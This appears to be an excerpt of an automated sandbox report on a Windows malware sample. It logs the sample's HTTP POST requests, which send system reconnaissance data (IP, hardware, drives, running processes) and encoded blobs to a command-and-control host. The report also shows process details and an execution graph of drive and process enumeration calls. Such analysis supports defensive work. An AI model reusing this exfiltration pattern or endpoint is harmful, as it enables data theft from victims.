                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 36 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710761", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                  Dec 20, 2024 17:06:05.138187885 CET2472OUTData Raw: 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f 30 38 4c
                                  Data Ascii: EXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowc
                                  Dec 20, 2024 17:06:05.138299942 CET4944OUTData Raw: 30 32 53 4d 5c 2f 4a 38 2b 48 48 2b 66 7a 71 4a 37 66 50 38 41 52 6d 39 50 72 38 76 31 49 66 4d 33 4e 73 5c 2f 6a 50 5c 2f 50 4d 5c 2f 77 43 75 7a 5c 2f 6e 31 39 36 68 71 5a 74 38 68 65 50 74 4a 39 66 33 50 30 36 5c 2f 35 37 63 30 7a 72 76 38 41
                                  Data Ascii: 02SM\/J8+HH+fzqJ7fP8ARm9Pr8v1IfM3Ns\/jP\/PM\/wCuz\/n196hqZt8hePtJ9f3P06\/57c0zrv8Akk3\/APPOP05\/znisjop9fl+pWOzzHcf9s5Ixz7\/5+n0psW+Tyf4E\/wCmfH+c\/wCeKlbMm9P\/ACH\/AI\/X\/PFQ4\/g\/j8rypf3X\/Lv\/AJ6emK6DQh8zd\/tiSL979o\/z\/h7ULHPt3j5\/M\/dSj\/
                                  Dec 20, 2024 17:06:05.138720989 CET2472OUTData Raw: 37 38 59 5c 2f 32 46 66 6a 44 38 4d 5c 2f 41 64 39 34 6a 5c 2f 41 47 67 66 42 66 69 58 55 76 67 5a 38 62 4c 6a 77 48 34 65 31 54 34 6a 66 43 5c 2f 34 6d 2b 46 5c 2f 44 64 7a 72 44 77 57 50 6a 4a 39 4c 66 78 54 70 5c 2f 68 6d 37 30 76 51 31 31 34
                                  Data Ascii: 78Y\/2FfjD8M\/Ad94j\/AGgfBfiXUvgZ8bLjwH4e1T4jfC\/4m+F\/DdzrDwWPjJ9LfxTp\/hm70vQ1142FtrNvpiXvh6+0g2UkfjnVpR\/kR9OTxF41r+Jv\/EM455GnwhgsFw9xDgMoeW5W1DPq2X5lhvrcsxeBeaSdWjjsRQVCeNlg4+1jP6upwjUj\/eX0RaGYZViqGdcJZnQ4e4w4ipZtwtDNsTRp46hi8PWxWBx2EyWW
                                  Dec 20, 2024 17:06:05.138798952 CET4944OUTData Raw: 66 57 71 75 48 78 75 5c 2f 69 2b 6e 66 48 58 31 36 2b 32 65 39 53 79 64 76 39 5a 33 5c 2f 41 4b 55 32 52 58 35 54 72 7a 5c 2f 72 50 38 5c 2f 70 31 5c 2f 6e 51 64 66 4f 5c 2f 4c 2b 76 6d 56 2b 63 37 39 6e 5c 2f 62 50 48 37 6a 5c 2f 77 44 56 5c 2f
                                  Data Ascii: fWquHxu\/i+nfHX16+2e9Sydv9Z3\/AKU2RX5Trz\/rP8\/p1\/nQdfO\/L+vmV+c79n\/bPH7j\/wDV\/nOag+T5\/wDWd\/p\/n+mO2aueTn\/WEN\/L9KrSR\/e3\/f49P8\/XFBqQ+iJ\/yz\/1X+f\/ANXtxTAHb7qeYfqR+tT7X\/3Of9X\/AMt+ntnrUHlv8n8eP8j9Pp+uaDoDy0\/jSNP+WvcT9Kpsvzf7H\/TT9xb
                                  Dec 20, 2024 17:06:05.138947964 CET2472OUTData Raw: 69 30 48 55 35 72 58 7a 54 4e 46 5a 61 78 70 31 78 49 69 78 33 63 4a 66 2b 78 2b 44 59 30 61 58 69 46 34 62 30 76 63 6a 69 50 38 41 58 6a 4a 5a 4f 4c 35 56 69 4a 59 61 4e 62 4d 50 59 7a 6b 74 4b 6b 71 4e 36 6b 33 54 6b 31 79 63 31 53 54 69 37 7a
                                  Data Ascii: i0HU5rXzTNFZaxp1xIix3cJf+x+DY0aXiF4b0vcjiP8AXjJZOL5ViJYaNbMPYzktKkqN6k3Tk1yc1STi7zd8M2wGKwXgN42YXC08dLh\/K\/B7N8vwU5fWKuX0MXTzTgjD1qUarTw0cfPC4PBRxSi1iKlOhh\/apxp0+X+VvB\/u\/wDoX+NNqxTMv6D\/AD+Nf9DZ\/wAqPtPL8f8AgEWz\/Z\/8d\/8ArUVN8\/8As\/rUNZ+
                                  Dec 20, 2024 17:06:05.139112949 CET4944OUTData Raw: 4b 5a 5c 2f 47 6e 31 4e 53 79 64 76 78 5c 2f 70 55 64 42 32 55 2b 76 79 49 66 6d 62 31 50 38 76 38 4d 31 47 30 61 65 34 54 70 5c 2f 6e 50 2b 65 6c 57 71 6a 6b 37 66 6a 5c 2f 53 67 63 4e 76 6e 2b 69 4b 63 6b 58 39 77 65 76 62 2b 67 5c 2f 78 39 65
                                  Data Ascii: KZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8M1G0ae4Tp\/nP+elWqjk7fj\/SgcNvn+iKckX9wevb+g\/x9earSK6Mf4\/1\/wAn0PX1q\/J\/ufz\/AP1+voBTP4fuR\/55+n4Yz7d6Df2nl+P\/AACh8\/8Ay06d\/wCnv6UwN8r4\/wCuv+e\/TJqzJH9z\/PX+pPv0qskeI97\/AD8\/5\/8ArUHRT6\/L9SHzOv8AH+mfamK
                                  Dec 20, 2024 17:06:05.139131069 CET2472OUTData Raw: 68 73 50 53 78 46 43 70 6c 65 58 30 38 52 56 78 57 4e 71 2b 78 72 56 4a 34 57 6a 47 47 45 78 62 6f 76 46 77 6f 53 78 54 77 75 49 68 68 59 31 70 30 61 6b 59 5c 2f 56 66 37 4f 48 37 55 5c 2f 78 48 5c 2f 5a 76 31 34 33 48 68 32 35 4f 73 2b 44 39 53
                                  Data Ascii: hsPSxFCpleX08RVxWNq+xrVJ4WjGGExbovFwoSxTwuIhhY1p0akY\/Vf7OH7U\/xH\/Zv143Hh25Os+D9SuY5PEngbUriUaRqgwsb3ti4EjaNriQqqQaraxt5nlwRajbahaQpbD3LSP+Ck37QOh+LfEU9zfaJ8S\/hve+MNc17w34A+LWhWfiVPDek32q3txpFjpWvW8lr4j0i70fTLiGxsHsNaNlpzW8f2S1MMaxt+elnb3V18
                                  Dec 20, 2024 17:06:05.258096933 CET7416OUTData Raw: 69 35 38 47 76 68 35 71 5c 2f 69 62 34 63 36 72 38 57 66 41 33 77 77 2b 49 58 69 44 34 67 61 62 38 52 76 47 33 67 43 7a 30 69 5c 2f 31 66 52 50 45 4e 68 48 34 58 2b 46 76 6a 48 77 4a 34 54 67 38 66 4a 70 64 39 42 38 4f 72 54 34 6f 2b 50 50 68 5c
                                  Data Ascii: i58Gvh5q\/ib4c6r8WfA3ww+IXiD4gab8RvG3gCz0i\/1fRPENhH4X+FvjHwJ4Tg8fJpd9B8OrT4o+PPh\/qXjJf7M1fSLGXw34j8M63rP4fPwV+iTTr47Cy4jzF4vLsdVy3FYSnneaVcXHGUK+a4avSo4Wll08Ri1Qr5FndKtWwlOvRpSyfM1UqR+oYr2X9I0\/pA\/Tlq0MuxUeFsqjhM0wUcwweNrcOZNh8E8JUhldSlUxOM
                                  Dec 20, 2024 17:06:05.258140087 CET2472OUTData Raw: 57 42 44 58 42 74 6f 44 4f 51 65 6f 4d 78 6a 38 77 67 39 77 57 77 61 64 39 67 30 38 77 50 43 62 47 7a 2b 7a 79 45 4e 4a 42 39 6c 68 38 6d 52 67 43 6f 4c 78 2b 58 73 59 67 45 71 43 79 6e 41 4a 48 51 31 5c 2f 4f 58 46 50 30 50 4f 45 75 4b 73 33 34
                                  Data Ascii: WBDXBtoDOQeoMxj8wg9wWwad9g08wPCbGz+zyENJB9lh8mRgCoLx+XsYgEqCynAJHQ1\/OXFP0POEuKs34kzzGZ7nGGzHiPOM3zqriMJ7KjPB4zMciXD+GqYKdKnTr0KuBwcq8vaxrOWKrVoTxSrfU8vjg\/6w4K+ntx\/wRw9wpwvl\/DeRYrKOFckyLJaGHxntqyxlLKc\/xHEFerjIVZVcPXlisVX9lSpyoKng6Maqw8YTx2
                                  Dec 20, 2024 17:06:05.258193016 CET2472OUTData Raw: 61 52 75 5c 2f 4c 79 51 4d 78 35 4a 36 6e 76 58 38 77 59 72 36 46 5c 2f 43 71 78 4d 63 5a 6c 48 45 2b 63 35 5a 69 49 35 78 6c 57 61 4a 71 4e 50 45 4a 51 79 7a 48 35 54 6e 6c 54 44 32 78 48 74 61 56 61 57 5a 38 54 35 52 51 34 6b 7a 54 46 34 79 6a
                                  Data Ascii: aRu\/LyQMx5J6nvX8wYr6F\/CqxMcZlHE+c5ZiI5xlWaJqNPEJQyzH5TnlTD2xHtaVaWZ8T5RQ4kzTF4yjisbisznXviY4StUwsv7Uw\/7QTjevluNyniDhDIM6weOyPMMoqubrYao6+PUsCsxi8O6U6FfC8N+y4Xw8MFWwlP8AsilepGeYSePPljxT8X9D8XfDr4Ufsny+JPA3h7wJqH7MX7XnwW+JH7Svhf4Oa4nxX+APxL8d


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.1049706185.121.15.192807280C:\Users\user\Desktop\iuO4kwUi17.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 17:06:06.839975119 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 443893
                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 36 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710761", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                  Dec 20, 2024 17:06:06.959765911 CET4944OUTData Raw: 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f 30 38 4c
                                  Data Ascii: EXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowc
                                  Dec 20, 2024 17:06:06.959809065 CET4944OUTData Raw: 31 6d 61 48 37 6b 50 39 34 5c 2f 68 5c 2f 49 55 32 6e 76 31 5c 2f 44 2b 70 70 6c 63 58 49 5c 2f 4c 2b 76 6b 66 35 50 6e 36 36 66 73 51 65 49 37 75 66 34 4c 36 6a 6f 79 33 44 4e 61 61 66 34 76 31 66 54 37 76 54 4a 39 74 7a 70 39 37 62 54 57 75 6c
                                  Data Ascii: 1maH7kP94\/h\/IU2nv1\/D+pplcXI\/L+vkf5Pn66fsQeI7uf4L6joy3DNaaf4v1fT7vTJ9tzp97bTWul6tGt\/plyZ7G9tnm1C5UQ3Vs8DskuYmO9399174W\/DTxL5kl74WXRL6Te7al4Nul0BpJW4j87RpbbUvDKWsXU22k6Lo0suMG8QktXwb+xt4607wh4L+Mmoa0bn+yfC0Gi+K7wWyRyTJYLa6xFqlxEkskEbNbQafb
                                  Dec 20, 2024 17:06:06.959850073 CET4944OUTData Raw: 66 57 71 75 48 78 75 5c 2f 69 2b 6e 66 48 58 31 36 2b 32 65 39 53 79 64 76 39 5a 33 5c 2f 41 4b 55 32 52 58 35 54 72 7a 5c 2f 72 50 38 5c 2f 70 31 5c 2f 6e 51 64 66 4f 5c 2f 4c 2b 76 6d 56 2b 63 37 39 6e 5c 2f 62 50 48 37 6a 5c 2f 77 44 56 5c 2f
                                  Data Ascii: fWquHxu\/i+nfHX16+2e9Sydv9Z3\/AKU2RX5Trz\/rP8\/p1\/nQdfO\/L+vmV+c79n\/bPH7j\/wDV\/nOag+T5\/wDWd\/p\/n+mO2aueTn\/WEN\/L9KrSR\/e3\/f49P8\/XFBqQ+iJ\/yz\/1X+f\/ANXtxTAHb7qeYfqR+tT7X\/3Of9X\/AMt+ntnrUHlv8n8eP8j9Pp+uaDoDy0\/jSNP+WvcT9Kpsvzf7H\/TT9xb
                                  Dec 20, 2024 17:06:06.959887981 CET2472OUTData Raw: 69 30 48 55 35 72 58 7a 54 4e 46 5a 61 78 70 31 78 49 69 78 33 63 4a 66 2b 78 2b 44 59 30 61 58 69 46 34 62 30 76 63 6a 69 50 38 41 58 6a 4a 5a 4f 4c 35 56 69 4a 59 61 4e 62 4d 50 59 7a 6b 74 4b 6b 71 4e 36 6b 33 54 6b 31 79 63 31 53 54 69 37 7a
                                  Data Ascii: i0HU5rXzTNFZaxp1xIix3cJf+x+DY0aXiF4b0vcjiP8AXjJZOL5ViJYaNbMPYzktKkqN6k3Tk1yc1STi7zd8M2wGKwXgN42YXC08dLh\/K\/B7N8vwU5fWKuX0MXTzTgjD1qUarTw0cfPC4PBRxSi1iKlOhh\/apxp0+X+VvB\/u\/wDoX+NNqxTMv6D\/AD+Nf9DZ\/wAqPtPL8f8AgEWz\/Z\/8d\/8ArUVN8\/8As\/rUNZ+
                                  Dec 20, 2024 17:06:06.959956884 CET2472OUTData Raw: 4b 5a 5c 2f 47 6e 31 4e 53 79 64 76 78 5c 2f 70 55 64 42 32 55 2b 76 79 49 66 6d 62 31 50 38 76 38 4d 31 47 30 61 65 34 54 70 5c 2f 6e 50 2b 65 6c 57 71 6a 6b 37 66 6a 5c 2f 53 67 63 4e 76 6e 2b 69 4b 63 6b 58 39 77 65 76 62 2b 67 5c 2f 78 39 65
                                  Data Ascii: KZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8M1G0ae4Tp\/nP+elWqjk7fj\/SgcNvn+iKckX9wevb+g\/x9earSK6Mf4\/1\/wAn0PX1q\/J\/ufz\/AP1+voBTP4fuR\/55+n4Yz7d6Df2nl+P\/AACh8\/8Ay06d\/wCnv6UwN8r4\/wCuv+e\/TJqzJH9z\/PX+pPv0qskeI97\/AD8\/5\/8ArUHRT6\/L9SHzOv8AH+mfamK
                                  Dec 20, 2024 17:06:06.960031033 CET2472OUTData Raw: 5c 2f 30 78 55 4b 79 47 50 7a 6d 64 4a 50 33 6e 5c 2f 50 76 5c 2f 7a 37 6a 76 38 41 5c 2f 71 37 56 70 37 54 79 5c 2f 48 5c 2f 67 41 4e 6b 78 35 65 5c 2f 66 49 37 2b 62 5c 2f 71 35 4a 66 33 48 54 6e 5c 2f 36 34 39 66 31 51 2b 58 35 6e 39 5c 2f 38
                                  Data Ascii: \/0xUKyGPzmdJP3n\/Pv\/z7jv8A\/q7Vp7Ty\/H\/gANkx5e\/fI7+b\/q5Jf3HTn\/649f1Q+X5n9\/8A7Zf6nj\/P5mnr\/uSe\/mfuP88H25o+WRpndN7+b+6\/z2\/zwKzOgZ5br539+P8A6Zfr\/WiRplkSH+D\/AJ+P64FCR7t+xy\/\/AG19v1zmm7fmR0hwP9VL5n+fyrT2nl+P\/AAhj\/eSeXsjmSP7RL5p\/ced
                                  Dec 20, 2024 17:06:06.960084915 CET2472OUTData Raw: 68 73 50 53 78 46 43 70 6c 65 58 30 38 52 56 78 57 4e 71 2b 78 72 56 4a 34 57 6a 47 47 45 78 62 6f 76 46 77 6f 53 78 54 77 75 49 68 68 59 31 70 30 61 6b 59 5c 2f 56 66 37 4f 48 37 55 5c 2f 78 48 5c 2f 5a 76 31 34 33 48 68 32 35 4f 73 2b 44 39 53
                                  Data Ascii: hsPSxFCpleX08RVxWNq+xrVJ4WjGGExbovFwoSxTwuIhhY1p0akY\/Vf7OH7U\/xH\/Zv143Hh25Os+D9SuY5PEngbUriUaRqgwsb3ti4EjaNriQqqQaraxt5nlwRajbahaQpbD3LSP+Ck37QOh+LfEU9zfaJ8S\/hve+MNc17w34A+LWhWfiVPDek32q3txpFjpWvW8lr4j0i70fTLiGxsHsNaNlpzW8f2S1MMaxt+elnb3V18
                                  Dec 20, 2024 17:06:07.080795050 CET2472OUTData Raw: 69 35 38 47 76 68 35 71 5c 2f 69 62 34 63 36 72 38 57 66 41 33 77 77 2b 49 58 69 44 34 67 61 62 38 52 76 47 33 67 43 7a 30 69 5c 2f 31 66 52 50 45 4e 68 48 34 58 2b 46 76 6a 48 77 4a 34 54 67 38 66 4a 70 64 39 42 38 4f 72 54 34 6f 2b 50 50 68 5c
                                  Data Ascii: i58Gvh5q\/ib4c6r8WfA3ww+IXiD4gab8RvG3gCz0i\/1fRPENhH4X+FvjHwJ4Tg8fJpd9B8OrT4o+PPh\/qXjJf7M1fSLGXw34j8M63rP4fPwV+iTTr47Cy4jzF4vLsdVy3FYSnneaVcXHGUK+a4avSo4Wll08Ri1Qr5FndKtWwlOvRpSyfM1UqR+oYr2X9I0\/pA\/Tlq0MuxUeFsqjhM0wUcwweNrcOZNh8E8JUhldSlUxOM
                                  Dec 20, 2024 17:06:07.080835104 CET2472OUTData Raw: 5c 2f 50 36 31 44 38 5c 2f 6c 37 7a 38 6e 35 64 66 2b 6e 54 2b 56 50 5c 2f 31 67 48 79 66 75 76 2b 57 58 66 5c 2f 50 42 5c 2f 50 4e 51 72 6e 37 68 5c 2f 77 42 4a 54 5c 2f 72 72 2b 5c 2f 68 5c 2f 44 6e 2b 56 63 35 31 38 37 38 76 36 2b 59 79 62 37
                                  Data Ascii: \/P61D8\/l7z8n5df+nT+VP\/1gHyfuv+WXf\/PB\/PNQrn7h\/wBJT\/rr+\/h\/Dn+Vc51878v6+Yyb7vyR\/P8A6qX\/AKbf569PT8YWVPMcp88f+q8z\/lv\/AJ6\/pV9v4H\/eP5cv7rnv+vX8qrNsjxs+5\/n\/AD9ePeg1KY3+X9\/t+98zPr\/n\/IpnybXT7ieV058\/seeP\/r+hp\/lvH\/q0jf8A4+P3nr+n50f
                                  Dec 20, 2024 17:06:07.080935955 CET4944OUTData Raw: 49 30 6c 52 6f 35 55 53 53 4e 78 68 30 6b 55 4f 6a 44 30 5a 57 42 56 68 37 45 45 56 6d 50 6f 4f 68 79 52 43 43 54 52 64 4a 6b 68 42 79 49 58 30 36 7a 61 49 48 4a 4f 52 47 30 4a 54 4f 53 54 6e 47 63 6b 6e 76 58 38 2b 65 4d 50 67 4c 6c 33 69 35 6e
                                  Data Ascii: I0lRo5USSNxh0kUOjD0ZWBVh7EEVmPoOhyRCCTRdJkhByIX06zaIHJORG0JTOSTnGcknvX8+eMPgLl3i5nnC2fYzPcdlOL4SwuMo5bTw1OnUoTr4rOMgzn6zXUrVVOnU4foYaE8PVoVY4TGZhSjUUsRGpR\/jfwG+kzmngbkHE\/DuE4Zy3P8ABcV46niMxlja1ejVjhXk+YZLicHS9nL2bp4jDZjVqP21OqqeJo4XEU1Cth6c1


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.1049708185.121.15.192807280C:\Users\user\Desktop\iuO4kwUi17.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 17:06:08.600967884 CET87OUTGET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Dec 20, 2024 17:06:09.874078989 CET212INHTTP/1.0 503 Service Unavailable
                                  Cache-Control: no-cache
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.104970398.85.100.804437280C:\Users\user\Desktop\iuO4kwUi17.exe
                                  TimestampBytes transferredDirectionData
                                  2024-12-20 16:06:01 UTC52OUTGET /ip HTTP/1.1
                                  Host: httpbin.org
                                  Accept: */*
                                  2024-12-20 16:06:01 UTC224INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 16:06:01 GMT
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Connection: close
                                  Server: gunicorn/19.9.0
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Credentials: true
                                  2024-12-20 16:06:01 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                  Data Ascii: { "origin": "8.46.123.189"}


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:11:05:55
                                  Start date:20/12/2024
                                  Path:C:\Users\user\Desktop\iuO4kwUi17.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\iuO4kwUi17.exe"
                                  Imagebase:0x7d0000
                                  File size:4'480'000 bytes
                                  MD5 hash:A7E8135CFE118AA459FE0483617FD64E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:11:06:09
                                  Start date:20/12/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152
                                  Imagebase:0xed0000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:0.3%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:66
                                    Total number of Limit Nodes:2
                                    execution_graph 11480 75e0259 11481 75e025c 11480->11481 11486 75e02d8 11481->11486 11483 75e02c8 Process32FirstW 11485 75e03ec 11483->11485 11487 75e02eb Process32FirstW 11486->11487 11489 75e03ec 11487->11489 11500 75a024d 11501 75a0251 11500->11501 11506 75a0267 11501->11506 11507 75a0275 GetLogicalDrives 11506->11507 11509 75a03e6 11507->11509 11764 75f0047 11765 75f0031 11764->11765 11767 75f0094 11765->11767 11768 75f0096 11765->11768 11769 75f00bd Process32NextW 11768->11769 11771 75f04bd 11769->11771 11518 75a0273 11519 75a0275 GetLogicalDrives 11518->11519 11521 75a03e6 11519->11521 11522 75e026f 11523 75e020f 11522->11523 11523->11522 11524 75e02d8 Process32FirstW 11523->11524 11525 75e02c8 Process32FirstW 11524->11525 11527 75e03ec 11525->11527 11392 75a0411 11393 75a0372 11392->11393 11394 75a03e6 11392->11394 11393->11394 11395 75a03b6 GetLogicalDrives 11393->11395 11395->11394 11814 75a0000 11815 75a001e 11814->11815 11816 75a0267 GetLogicalDrives 11815->11816 11817 75a0258 GetLogicalDrives 11816->11817 11819 75a03e6 11817->11819 11820 75e0000 11821 75e001a 11820->11821 11822 75e02d8 Process32FirstW 11821->11822 11823 75e02c8 Process32FirstW 11822->11823 11825 75e03ec 11823->11825 11826 75f0000 11831 75f0017 11826->11831 11834 75f0018 11831->11834 11832 75f0096 Process32NextW 11832->11834 11833 75f0094 11834->11832 11834->11833 11845 75f0029 11846 75f0031 11845->11846 11847 75f0096 Process32NextW 11846->11847 11848 75f0094 11846->11848 11847->11846 11460 75a03d3 11461 75a0372 GetLogicalDrives 11460->11461 11463 75a03e6 11460->11463 11461->11463 11572 75e02fc 11573 75e0300 Process32FirstW 11572->11573 11575 75e03ec 11573->11575 11877 